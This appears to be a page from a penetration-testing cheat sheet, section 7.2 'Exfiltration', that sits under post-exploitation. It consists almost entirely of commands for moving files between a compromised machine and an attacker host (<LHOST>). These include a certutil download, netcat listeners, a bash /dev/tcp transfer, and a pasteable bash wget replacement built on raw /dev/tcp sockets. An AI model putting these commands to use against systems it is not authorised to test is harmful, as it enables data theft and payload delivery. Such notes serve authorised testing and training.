7.2-Exfiltration.md

7.2 Exfiltration

Table of Contents

• File Transfer
  • Certutil
  • File Encryption / Decryption
  • Ncat
  • Python3 HTTP Server
  • Python SimpleHTTPServer
  • Simple FTP Server
  • Transfering Files with Bash
  • wget Replacement in Bash

File Transfer

Certutil

Base64 Encoding

C:\> certutil.exe -urlcache -split -f "http://<LHOST>/<FILE>" <FILE>

Base64 Decoding

C:\> certutil.exe -decode <FILE>.txt <FILE>.dll

File Encryption / Decryption

Encryption

$ openssl enc -aes-256-cbc -pbkdf2 < <FILE> > <FILE>.enc

Decryption

$ openssl enc -d -aes-256-cbc -pbkdf2 < <FILE>.enc > <FILE>

Ncat

$ ncat --ssl -lnvp <LPORT>

Python3 HTTP Server

$ pyhton3 -m http.server <LPORT>

Python SimpleHTTPServer

$ python -m SimpleHTTPServer <LPORT>

Simple FTP Server

$ python -m pyftpdlib -p 21 --write

Transfering Files with Bash

$ nc -lnvp <LPORT> < <FILE>

$ bash -c 'cat < /dev/tcp/<LHOST>/<LPORT>' > <FILE>

wget Replacement in Bash

Copy the following script directly to the shell.

function __wget() {
    : ${DEBUG:=0}
    local URL=$1
    local tag="Connection: close"
    local mark=0

    if [ -z "${URL}" ]; then
        printf "Usage: %s \"URL\" [e.g.: %s http://www.google.com/]" \
               "${FUNCNAME[0]}" "${FUNCNAME[0]}"
        return 1;
    fi
    read proto server path <<<$(echo ${URL//// })
    DOC=/${path// //}
    HOST=${server//:*}
    PORT=${server//*:}
    [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
    [[ $DEBUG -eq 1 ]] && echo "HOST=$HOST"
    [[ $DEBUG -eq 1 ]] && echo "PORT=$PORT"
    [[ $DEBUG -eq 1 ]] && echo "DOC =$DOC"

    exec 3<>/dev/tcp/${HOST}/$PORT
    echo -en "GET ${DOC} HTTP/1.1\r\nHost: ${HOST}\r\n${tag}\r\n\r\n" >&3
    while read line; do
        [[ $mark -eq 1 ]] && echo $line
        if [[ "${line}" =~ "${tag}" ]]; then
            mark=1
        fi
    done <&3
    exec 3>&-
}

Previous

• 7 Actions-on-Objective
• 7.1 Post Exploitation